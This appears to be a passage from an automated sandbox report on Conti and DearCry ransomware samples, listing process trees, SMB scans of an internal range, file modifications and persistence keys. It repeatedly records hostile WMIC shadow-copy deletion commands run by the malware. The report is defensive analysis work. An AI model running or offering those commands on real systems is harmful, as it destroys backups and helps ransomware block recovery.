PID 1556 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2164 wrote to memory of 3068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1928 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 3032 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2940 wrote to memory of 1440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{84B23760-D083-4387-974D-3C4546D42F6A}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{84B23760-D083-4387-974D-3C4546D42F6A}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7F4FF19A-F0A9-4D37-804C-BBA1AC496F39}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7F4FF19A-F0A9-4D37-804C-BBA1AC496F39}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9F6E7A5F-91E3-42B9-9E2A-D87FADA45EB4}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9F6E7A5F-91E3-42B9-9E2A-D87FADA45EB4}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{314E70DD-6CC8-441F-8B30-A71AFD3666D4}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{314E70DD-6CC8-441F-8B30-A71AFD3666D4}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F28370CD-B12E-4E29-BDEC-FADD070A311C}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F28370CD-B12E-4E29-BDEC-FADD070A311C}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9CFA1FAC-8B30-464C-A41C-E8A415E47E56}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9CFA1FAC-8B30-464C-A41C-E8A415E47E56}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CE807F35-9C0E-4446-B318-8485AF6C0259}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CE807F35-9C0E-4446-B318-8485AF6C0259}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{ED089E91-80BF-4ED9-8981-C380E00AF48A}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{ED089E91-80BF-4ED9-8981-C380E00AF48A}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D1A50FE4-92ED-419B-8E4F-FD59A2FB70FF}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D1A50FE4-92ED-419B-8E4F-FD59A2FB70FF}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{95BCBF4B-AB01-429A-BC22-D699995F488D}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{95BCBF4B-AB01-429A-BC22-D699995F488D}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D3411E52-7961-4272-BD9B-AC00A7C176FD}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D3411E52-7961-4272-BD9B-AC00A7C176FD}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5A5BC5FA-1945-4C64-98AB-48EB9B258476}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5A5BC5FA-1945-4C64-98AB-48EB9B258476}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4209BC2E-63F3-4311-B318-4266CE6427FD}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4209BC2E-63F3-4311-B318-4266CE6427FD}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{0FB96D71-416E-4221-B050-53851A8DFEFF}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{0FB96D71-416E-4221-B050-53851A8DFEFF}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CA9D1DC0-6918-4793-9B97-17DC4DC11B7A}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CA9D1DC0-6918-4793-9B97-17DC4DC11B7A}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5F3413EA-0DE7-4717-9100-512425AA05AF}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5F3413EA-0DE7-4717-9100-512425AA05AF}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B69ED39F-CDDB-47E0-81FC-5EF4BC215C92}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B69ED39F-CDDB-47E0-81FC-5EF4BC215C92}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{C44555B4-BF9B-4600-B9BC-43446450A014}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{C44555B4-BF9B-4600-B9BC-43446450A014}'" delete

Network

Country Destination Domain Proto
N/A 10.127.255.98:445 tcp
N/A 10.127.255.69:445 tcp
N/A 10.127.255.82:445 tcp
N/A 10.127.255.79:445 tcp
N/A 10.127.255.192:445 tcp
N/A 10.127.255.73:445 tcp
N/A 10.127.255.109:445 tcp
N/A 10.127.255.96:445 tcp
N/A 10.127.255.68:445 tcp
N/A 10.127.255.107:445 tcp
N/A 10.127.255.80:445 tcp
N/A 10.127.255.99:445 tcp
N/A 10.127.255.70:445 tcp
N/A 10.127.255.123:445 tcp
N/A 10.127.255.104:445 tcp
N/A 10.127.255.120:445 tcp
N/A 10.127.255.111:445 tcp
N/A 10.127.255.77:445 tcp
N/A 10.127.255.102:445 tcp
N/A 10.127.255.81:445 tcp
N/A 10.127.255.112:445 tcp
N/A 10.127.255.91:445 tcp
N/A 10.127.255.97:445 tcp
N/A 10.127.255.105:445 tcp
N/A 10.127.255.113:445 tcp
N/A 10.127.255.100:445 tcp
N/A 10.127.255.95:445 tcp
N/A 10.127.255.125:445 tcp
N/A 10.127.255.71:445 tcp
N/A 10.127.255.128:445 tcp
N/A 10.127.255.78:445 tcp
N/A 10.127.255.89:445 tcp
N/A 10.127.255.121:445 tcp
N/A 10.127.255.90:445 tcp
N/A 10.127.255.75:445 tcp
N/A 10.127.255.108:445 tcp
N/A 10.127.255.126:445 tcp
N/A 10.127.255.83:445 tcp
N/A 10.127.255.127:445 tcp
N/A 10.127.255.88:445 tcp
N/A 10.127.255.106:445 tcp
N/A 10.127.255.129:445 tcp
N/A 10.127.255.132:445 tcp
N/A 10.127.255.157:445 tcp
N/A 10.127.255.174:445 tcp
N/A 10.127.255.141:445 tcp
N/A 10.127.255.171:445 tcp
N/A 10.127.255.139:445 tcp
N/A 10.127.255.156:445 tcp
N/A 10.127.255.164:445 tcp
N/A 10.127.255.148:445 tcp
N/A 10.127.255.147:445 tcp
N/A 10.127.255.166:445 tcp
N/A 10.127.255.173:445 tcp
N/A 10.127.255.86:445 tcp
N/A 10.127.255.138:445 tcp
N/A 10.127.255.163:445 tcp
N/A 10.127.255.155:445 tcp
N/A 10.127.255.67:445 tcp
N/A 10.127.255.135:445 tcp
N/A 10.127.255.160:445 tcp
N/A 10.127.255.101:445 tcp
N/A 10.127.255.114:445 tcp
N/A 10.127.255.161:445 tcp
N/A 10.127.255.115:445 tcp
N/A 10.127.255.241:445 tcp
N/A 10.127.255.151:445 tcp
N/A 10.127.255.170:445 tcp
N/A 10.127.255.242:445 tcp
N/A 10.127.255.74:445 tcp
N/A 10.127.255.162:445 tcp
N/A 10.127.255.93:445 tcp
N/A 10.127.255.146:445 tcp
N/A 10.127.255.130:445 tcp
N/A 10.127.255.149:445 tcp
N/A 10.127.255.118:445 tcp
N/A 10.127.255.110:445 tcp
N/A 10.127.255.143:445 tcp
N/A 10.127.255.134:445 tcp
N/A 10.127.255.145:445 tcp
N/A 10.127.255.243:445 tcp
N/A 10.127.255.94:445 tcp
N/A 10.127.255.87:445 tcp
N/A 10.127.255.131:445 tcp
N/A 10.127.255.152:445 tcp
N/A 10.127.255.159:445 tcp
N/A 10.127.255.144:445 tcp
N/A 10.127.255.168:445 tcp
N/A 10.127.255.76:445 tcp
N/A 10.127.255.142:445 tcp
N/A 10.127.255.140:445 tcp
N/A 10.127.255.169:445 tcp
N/A 10.127.255.165:445 tcp
N/A 10.127.255.119:445 tcp
N/A 10.127.255.153:445 tcp
N/A 10.127.255.92:445 tcp
N/A 10.127.255.172:445 tcp
N/A 10.127.255.137:445 tcp
N/A 10.127.255.85:445 tcp
N/A 10.127.255.116:445 tcp
N/A 10.127.255.154:445 tcp
N/A 10.127.255.136:445 tcp
N/A 10.127.255.66:445 tcp
N/A 10.127.255.117:445 tcp
N/A 10.127.255.133:445 tcp
N/A 10.127.255.150:445 tcp
N/A 10.127.255.84:445 tcp
N/A 10.127.255.158:445 tcp
N/A 10.127.255.167:445 tcp
N/A 10.127.255.220:445 tcp
N/A 10.127.255.194:445 tcp
N/A 10.127.255.215:445 tcp
N/A 10.127.255.247:445 tcp
N/A 10.127.255.184:445 tcp
N/A 10.127.255.198:445 tcp
N/A 10.127.255.230:445 tcp
N/A 10.127.255.212:445 tcp
N/A 10.127.255.183:445 tcp
N/A 10.127.255.213:445 tcp
N/A 10.127.255.197:445 tcp
N/A 10.127.255.216:445 tcp
N/A 10.127.255.219:445 tcp
N/A 10.127.255.221:445 tcp
N/A 10.127.255.205:445 tcp
N/A 10.127.255.210:445 tcp
N/A 10.127.255.229:445 tcp
N/A 10.127.255.178:445 tcp
N/A 10.127.255.204:445 tcp
N/A 10.127.255.231:445 tcp
N/A 10.127.255.228:445 tcp
N/A 10.127.255.188:445 tcp
N/A 10.127.255.244:445 tcp
N/A 10.127.255.211:445 tcp
N/A 10.127.255.233:445 tcp
N/A 10.127.255.177:445 tcp
N/A 10.127.255.207:445 tcp
N/A 10.127.255.232:445 tcp
N/A 10.127.255.195:445 tcp
N/A 10.127.255.224:445 tcp
N/A 10.127.255.199:445 tcp
N/A 10.127.255.186:445 tcp
N/A 10.127.255.181:445 tcp
N/A 10.127.255.218:445 tcp
N/A 10.127.255.254:445 tcp
N/A 10.127.255.223:445 tcp
N/A 10.127.255.176:445 tcp
N/A 10.127.255.187:445 tcp
N/A 10.127.255.246:445 tcp
N/A 10.127.255.217:445 tcp
N/A 10.127.255.226:445 tcp
N/A 10.127.255.253:445 tcp
N/A 10.127.255.193:445 tcp
N/A 10.127.255.202:445 tcp
N/A 10.127.255.191:445 tcp
N/A 10.127.255.203:445 tcp
N/A 10.127.255.227:445 tcp
N/A 10.127.255.225:445 tcp
N/A 10.127.255.222:445 tcp
N/A 10.127.255.189:445 tcp
N/A 10.127.255.248:445 tcp
N/A 10.127.255.175:445 tcp
N/A 10.127.255.208:445 tcp
N/A 10.127.255.196:445 tcp
N/A 10.127.255.251:445 tcp
N/A 10.127.255.214:445 tcp
N/A 10.127.255.235:445 tcp
N/A 10.127.255.200:445 tcp
N/A 10.127.255.180:445 tcp
N/A 10.127.255.245:445 tcp
N/A 10.127.255.201:445 tcp
N/A 10.127.255.185:445 tcp
N/A 10.127.255.240:445 tcp
N/A 10.127.255.190:445 tcp
N/A 10.127.255.209:445 tcp
N/A 10.127.255.206:445 tcp
N/A 10.127.255.179:445 tcp
N/A 10.127.255.182:445 tcp
N/A 10.127.255.234:445 tcp
N/A 10.127.255.249:445 tcp
N/A 10.127.255.239:445 tcp
N/A 10.127.255.252:445 tcp
N/A 10.127.255.250:445 tcp
N/A 10.127.255.236:445 tcp

Files

C:\Program Files (x86)\R3ADM3.txt

MD5 e6f001fc98cb51a0429ca5dc95f6a950
SHA1 16a73b95d0b5408fa95c97bc9f314f1eff4902b4
SHA256 acf1bb83790c25806dd3c29e0b453002397c7fe7abc25a3470ae4e3164f9f31b
SHA512 11e65ed0e80aedb497ab40edf5d3f756b121527cb1102408cdd9f146549c849a41a16fc908bb284c920b061c6b37723117b929de150a62cd61273c40e660168c

Analysis: behavioral24

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:39

Platform

win10v2004-20240704-en

Max time kernel

280s

Max time network

1813s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

Signatures

DearCry

ransomware dearcry

Renames multiple (7382) files with added filename extension

ransomware

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Windows\explorer.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini C:\Windows\explorer.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-72_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\PROGRAM FILES\WINDOWSAPPS\MICROSOFT.VCLIBS.140.00.UWPDESKTOP_14.0.27629.0_X64__8WEKYB3D8BBWE\MICROSOFT.SYSTEM.PACKAGE.METADATA\AUTOGEN\readme.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-400_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-16.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru\System.Windows.Controls.Ribbon.resources.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\fxplugins.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.es-es.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\csi.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
